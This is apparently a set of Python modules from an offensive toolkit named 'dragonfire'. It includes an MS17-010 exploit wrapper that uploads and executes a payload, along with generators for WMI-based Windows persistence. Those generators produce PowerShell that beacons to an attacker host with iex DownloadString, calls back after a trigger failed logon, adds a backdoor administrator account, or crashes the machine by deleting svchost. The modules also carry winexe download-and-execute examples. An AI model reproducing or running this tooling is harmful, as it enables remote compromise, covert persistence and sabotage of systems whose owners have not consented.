class create: #define info here info = ''' This is an info piece. It will display whenever someone checks the info of this module Consider it a small README ''' #what is the 'information' or 'README' option_list=["option_a","option_b","option_c"] #a list of all possible options #initialize variables here. All Variables must be initialized, even if the value is "" #variables will have a name, value, IsRequired, and Description -- keep descriptions relativelt short, add to README if needed #option=setting(str,str,bool,str) option_a=setting("option_a","value_a",False,"value for option_a") option_b=setting("option_b","",True,"value for option_b") option_c=setting("option_c","value_c",False,"value for option_c") #initialize power_beacon class def __init__(self): self.name="my_module_name" def run(self) : #the actual function #recommend doing all variable checking here #variables won't be checked in dfconsole and will be passed as strings print "These are the options I was passed and can use." print self.option_a.value print self.option_b.value print self.option_c.value
class create: #define info here info = ''' MS17-010 exploit for Windows 2000 and later by sleepya DRAGONFIRE: altered system call to upload and execute specified file, converted for dragonfire. Note: - The exploit should never crash a target (chance should be nearly 0%) - Named pipe is needed - Upload name is hard coded, might require changes to blend Tested on: - Windows 2016 x64 - Windows 10 Pro Build 10240 x64 - Windows 2012 R2 x64 - Windows 8.1 x64 - Windows 2008 R2 SP1 x64 - Windows 7 SP1 x64 - Windows 2008 SP1 x64 - Windows 2003 R2 SP2 x64 - Windows XP SP2 x64 - Windows 8.1 x86 - Windows 7 SP1 x86 - Windows 2008 SP1 x86 - Windows 2003 SP2 x86 - Windows XP SP3 x86 - Windows 2000 SP4 x86 ''' #what is the 'information' or 'README' option_list = ["target", "payload", "pipe_name"] #a list of all possible options target = setting("target", "192.168.0.0", True, "Target IP address") payload = setting("payload", "/payloads/payload.exe", True, "Payload to upload") pipe_name = setting("pipe_name", "", False, "browser, spoolss, netlogon, lsarpc, samr") #if len(sys.argv) < 3: # print("{} <ip> <file> [pipe_name]".format(sys.argv[0])) # sys.exit(1) #target = sys.argv[1] def __init__(self): self.name = "ms17-10" def run(self): target = self.target.value payload = self.payload.value pipe_name = self.pipe_name.value # pipe_name=self.pipe_name.value if len(pipe_name) < 1: pipe_name = None #pipe_name = None #if len(pipe_name) < 1 else self.pipe_name.value exploit(target, pipe_name, payload) print('Own the Net!')
class create: #define info here beacon_settings=''' Beacon_Interval: How often you want the beacon. Select a number from the list below. 0 -- Every 15 Seconds 1 -- Every Minute 2 -- Every 15 Minutes 3 -- Every 30 Minutes 4 -- Every 1 Hour ''' info = ''' This module will build a script for the creation of the WMI objects required to install a WMI based windows beaconer. Settings: IP: The IP address you want the beaconer to beacon to. PORT: The port to use. PATH: The name or path to the payload file on your web server. Filter: Name of the WMI filter. Consumer: Name of the WMI consumer. OutputFile: Filename of the locally generated file. Beacon_Interval: How often you want the beacon. Enter a number from the list below. Anything else will cause the module to exit. 0 -- Every 15 Seconds 1 -- Every Minute 2 -- Every 15 Minutes 3 -- Every 30 Minutes 4 -- Every 1 Hour 5 -- Every 4 Hours Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute. ''' #create a list of possible options option_list=["ip","port","path","filter","consumer","output_file","beacon_interval","use_ssl"] #initialize variables ip=setting("ip","1.1.1.1",True,"beacon ip address") port=setting("port","8080",True,"beacon port") path=setting("path","index.html",True,"path to download file on server") use_ssl=setting("use_ssl","no",True,"use SSL for callback?") filter=setting("filter","",True,"name of WMI filter") consumer=setting("consumer","",True,"name of WMI consumer") output_file=setting("output_file","",False,"local output filename") beacon_interval=setting("beacon_interval","",True,"beacon interval...see info for options") #initialize power_beacon class def __init__(self): self.name="powerbeacon" def run(self) : ip=self.ip.value port=self.port.value path=self.path.value filter=self.filter.value consumer=self.consumer.value output=self.output_file.value interval=self.beacon_interval.value beacon=self.beacon_settings use_ssl=self.use_ssl.value try: interval=int(interval) except: print "Invalid beacon_interval..." print beacon return if (interval < 0) or (interval > 5): print "Invalid beacon_interval..." print beacon return interval_setting="" if interval==1: interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Second=0\"" if interval==2: interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Minute=1 OR TargetInstance.Minute=15 OR TargetInstance.Minute=30 OR TargetInstance.Minute=45) AND TargetInstance.Second=0\"" if interval==3: interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Minute=1 OR TargetInstance.Minute=30) AND TargetInstance.Second=0\"" if interval==4: interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Minute=1) AND TargetInstance.Second=0\"" if interval==5: interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Hour=0 OR TargetInstance.Hour=4 OR TargetInstance.Hour=8 OR TargetInstance.Hour=12 OR TargetInstance.Hour=16 OR TargetInstance.Hour=20) AND TargetInstance.Minute=1 AND TargetInstance.Second=0\"" if interval==0: interval_setting="$instanceFilter.Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Second=0 OR TargetInstance.Second=15 OR TargetInstance.Second=30 OR TargetInstance.Second=45)\"" address=ip + ":" + port + "/" + path if use_ssl == "no": messageblock="\"powershell -command `\"iex(New-Object Net.WebClient).DownloadString('http://%s')`\"\"" % (address) elif use_ssl == "yes": messageblock = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).DownloadString('https://%s')" % (address) encodedmessage = b64encode(messageblock.encode('UTF-16LE')) messageblock="\"powershell -e %s \"" % (encodedmessage) else: print "use_ssl must be either 'yes' or 'no'" return address=ip + ":" + port + "/" + path data=''' $instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance() $instanceFilter.QueryLanguage = "WQL" %s $instanceFilter.Name = "%s" $instanceFilter.EventNamespace = 'root\cimv2' $result = $instanceFilter.Put() $newFilter = $result.Path $instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance() $instanceConsumer.Name = '%s' $instanceConsumer.CommandLineTemplate = %s $result = $instanceConsumer.Put() $newConsumer = $result.Path $instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance() $instanceBinding.Filter = $newFilter $instanceBinding.Consumer = $newConsumer $result = $instanceBinding.Put() $newBinding = $result.Path ''' % (interval_setting,filter,consumer,messageblock) remove_data= ''' $x="\\\.\\root\subscription:__EventFilter.Name='%s'" ([wmi]$x).Delete() $x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'" ([wmi]$x).Delete() $x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""' ([wmi]$x).Delete() ''' % (filter,consumer,consumer,filter) if output=='': print data print "\n" print "To Remove" print "---------------------------------" print remove_data return else: output="output/"+output f = open(output,'w') f.write(data) f.close() output=output+"_remove" f = open(output,'w') f.write(remove_data) f.close() print "Files have been written..." return
class create: #define info here info = ''' This is the failsafe for windows persistence module. After installing on a target, failing to login with 'FailName' perform a callback to a specified IP" Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute. Ex: winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/failsafe')" #FAIL TO LOGIN #After installed, fail to login with FailName@[CALLBACK_IP] example is for 127.0.0.1 winexe -U FailName@7F000001%password //192.168.0.100 ''' #create a list of possible options option_list = [ "FailName", "callback_port", "callback_file", "filter", "consumer", "reset_auditpol", "use_ssl", "output_file" ] #initialize variables FailName = setting("FailName", "", True, "Name to fail logon") filter = setting("filter", "ServiceFilter", True, "name of WMI filter") consumer = setting("consumer", "ServiceConsumer", True, "name of WMI consumer") callback_port = setting("callback_port", "4444", True, "Callback Port") callback_file = setting("callback_file", "", True, "Powershell file to get after failed login") reset_auditpol = setting( "reset_auditpol", "yes", True, "Upon uninstall, reset auditpolicy to NOT log failures?") use_ssl = setting("use_ssl", "no", True, "Set to 'yes' if you want to use SSL") output_file = setting("output_file", "", False, "local output filename") #initialize power_beacon class def __init__(self): self.name = "powerbeacon" def run(self): FailName = self.FailName.value filter = self.filter.value consumer = self.consumer.value output = self.output_file.value callback_port = self.callback_port.value callback_file = self.callback_file.value reset_auditpol = self.reset_auditpol.value use_ssl = self.use_ssl.value if use_ssl == "no": messageblock = '''if(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s){$x=(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s).split('@');iex(New-Object Net.WebClient).DownloadString('http://0x'+$x[1]+':%s/%s')}''' % ( FailName, FailName, callback_port, callback_file) else: messageblock = '''if(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s){$x=(wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4625]\" | findstr /i %s).split('@');[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).DownloadString('https://0x'+$x[1]+':%s/%s')}''' % ( FailName, FailName, callback_port, callback_file) encodedmessage = b64encode(messageblock.encode('UTF-16LE')) data = ''' auditpol /set /subcategory:"Logon" /success:enable /failure:enable $instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance() $instanceFilter.QueryLanguage = "WQL" $instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')" $instanceFilter.Name = "%s" $instanceFilter.EventNamespace = 'root\cimv2' $result = $instanceFilter.Put() $newFilter = $result.Path $instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance() $instanceConsumer.Name = '%s' $instanceConsumer.CommandLineTemplate = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){powershell -e %s}"' $result = $instanceConsumer.Put() $newConsumer = $result.Path $instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance() $instanceBinding.Filter = $newFilter $instanceBinding.Consumer = $newConsumer $result = $instanceBinding.Put() $newBinding = $result.Path ''' % (filter, consumer, FailName, encodedmessage) remove_data = '' if reset_auditpol == "yes": remove_data = ''' auditpol /set /subcategory:"Logon" /success:enable /failure:disable ''' remove_data += ''' $x="\\\.\\root\subscription:__EventFilter.Name='%s'" ([wmi]$x).Delete() $x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'" ([wmi]$x).Delete() $x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""' ([wmi]$x).Delete() ''' % (filter, consumer, consumer, filter) if (reset_auditpol != "yes") and (reset_auditpol != "no"): print "reset_auditpol must be 'yes' or 'no'" return if (use_ssl != "yes") and (use_ssl != "no"): print "use_ssl must be either yes or no" return if output == '': print data print "\n" print "To Remove" print "---------------------------------" print remove_data return else: output = "output/" + output f = open(output, 'w') f.write(data) f.close() output = output + "_remove" f = open(output, 'w') f.write(remove_data) f.close() print "Files have been written..." return
class create: #define info here info = ''' This is the failsafe for windows persistence module. After installing on a target, failing to login with 'FailName' will create an admin account called "CreateName" Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute. Ex: winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/persist')" ''' #create a list of possible options option_list = [ "FailName", "CreateName", "password", "filter", "consumer", "output_file" ] #initialize variables FailName = setting("FailName", "", True, "Name to fail logon") CreateName = setting("CreateName", "", True, "New Username to add") password = setting("password", "password", True, "PW for new user") filter = setting("filter", "ServiceFilter", True, "name of WMI filter") consumer = setting("consumer", "ServiceConsumer", True, "name of WMI consumer") output_file = setting("output_file", "", False, "local output filename") #initialize power_beacon class def __init__(self): self.name = "powerbeacon" def run(self): FailName = self.FailName.value password = self.password.value CreateName = self.CreateName.value filter = self.filter.value consumer = self.consumer.value output = self.output_file.value data = ''' auditpol /set /subcategory:"Logon" /success:enable /failure:enable $instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance() $instanceFilter.QueryLanguage = "WQL" $instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')" $instanceFilter.Name = "%s" $instanceFilter.EventNamespace = 'root\cimv2' $result = $instanceFilter.Put() $newFilter = $result.Path $instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance() $instanceConsumer.Name = '%s' $instanceConsumer.CommandLineTemplate = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){cmd /c net users %s %s /add `&`& net localgroup administrators %s /add}"' $result = $instanceConsumer.Put() $newConsumer = $result.Path $instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance() $instanceBinding.Filter = $newFilter $instanceBinding.Consumer = $newConsumer $result = $instanceBinding.Put() $newBinding = $result.Path ''' % (filter, consumer, FailName, CreateName, password, CreateName) remove_data = ''' auditpol /set /subcategory:"Logon" /success:enable /failure:disable net users %s /delete $x="\\\.\\root\subscription:__EventFilter.Name='%s'" ([wmi]$x).Delete() $x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'" ([wmi]$x).Delete() $x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""' ([wmi]$x).Delete() ''' % (CreateName, filter, consumer, consumer, filter) if output == '': print data print "\n" print "To Remove" print "---------------------------------" print remove_data return else: output = "output/" + output f = open(output, 'w') f.write(data) f.close() output = output + "_remove" f = open(output, 'w') f.write(remove_data) f.close() print "Files have been written..." return
class create: #define info here info = ''' This module creates a WMI filter where failing to logon with 'FailName' crashed the box by deleting running instances of svchost. Once the payload has been generated, either copy and paste the commands into a system level powershell, or download via a powershell download and execute. Ex: winexe -U user%password //192.168.0.100 "powershell -c iex(New-Object Net.WebClient).DownloadString('http://192.168.0.136:8080/persist')" ''' #create a list of possible options option_list=["FailName","filter","consumer","output_file","reset_auditpol"] #initialize variables FailName=setting("FailName","",True,"Name to fail logon") filter=setting("filter","ServiceFilter",True,"name of WMI filter") consumer=setting("consumer","ServiceConsumer",True,"name of WMI consumer") output_file=setting("output_file","",False,"local output filename") reset_auditpol=setting("reset_auditpol","yes",True,"reset auditpol on removal?") #initialize power_beacon class def __init__(self): self.name="powerbeacon" def run(self) : FailName=self.FailName.value filter=self.filter.value consumer=self.consumer.value output=self.output_file.value reset_auditpol=self.reset_auditpol.value data= ''' auditpol /set /subcategory:"Logon" /success:enable /failure:enable $instanceFilter = ([wmiclass]"\\\.\\root\subscription:__EventFilter").CreateInstance() $instanceFilter.QueryLanguage = "WQL" $instanceFilter.Query ="select * from __InstanceCreationEvent where TargetInstance isa 'Win32_NtLogEvent' and TargetInstance.logfile = 'Security' and (TargetInstance.EventCode = '4625')" $instanceFilter.Name = "%s" $instanceFilter.EventNamespace = 'root\cimv2' $result = $instanceFilter.Put() $newFilter = $result.Path $instanceConsumer = ([wmiclass]"\\\.\\root\subscription:CommandLineEventConsumer").CreateInstance() $instanceConsumer.Name = '%s' $instanceConsumer.CommandLineTemplate = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -c "if(wevtutil qe security /rd:true /f:text /c:1 /q:`"*[System/EventID=4625]`" | findstr /i %s){powershell -e dwBtAGkAYwAgAHAAcgBvAGMAZQBzAHMAIAB3AGgAZQByAGUAIABuAGEAbQBlAD0AYAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQBgACcAIABkAGUAbABlAHQAZQA=}"' $result = $instanceConsumer.Put() $newConsumer = $result.Path $instanceBinding = ([wmiclass]"\\\.\\root\subscription:__FilterToConsumerBinding").CreateInstance() $instanceBinding.Filter = $newFilter $instanceBinding.Consumer = $newConsumer $result = $instanceBinding.Put() $newBinding = $result.Path ''' % (filter,consumer,FailName) remove_data= ''' $x="\\\.\\root\subscription:__EventFilter.Name='%s'" ([wmi]$x).Delete() $x="\\\.\\root\subscription:CommandLineEventConsumer.Name='%s'" ([wmi]$x).Delete() $x='\\\.\\root\subscription:__FilterToConsumerBinding.Consumer="\\\\\\\\.\\\\root\\\\subscription:CommandLineEventConsumer.Name=\\"%s\\"",Filter="\\\\\\\\.\\\\root\\\\subscription:__EventFilter.Name=\\"%s\\""' ([wmi]$x).Delete() ''' % (filter,consumer,consumer,filter) if (reset_auditpol!="yes" and reset_auditpol!="no"): print "Enter 'yes' or 'no' for 'reset_auditpol'" return else: if reset_auditpol=="yes": remove_data=remove_data+"auditpol /set /subcategory:\"Logon\" /success:enable /failure:disable" if output=='': print data print "\n" print "To Remove" print "---------------------------------" print remove_data return else: output="output/"+output f = open(output,'w') f.write(data) f.close() output=output+"_remove" f = open(output,'w') f.write(remove_data) f.close() print "Files have been written..." return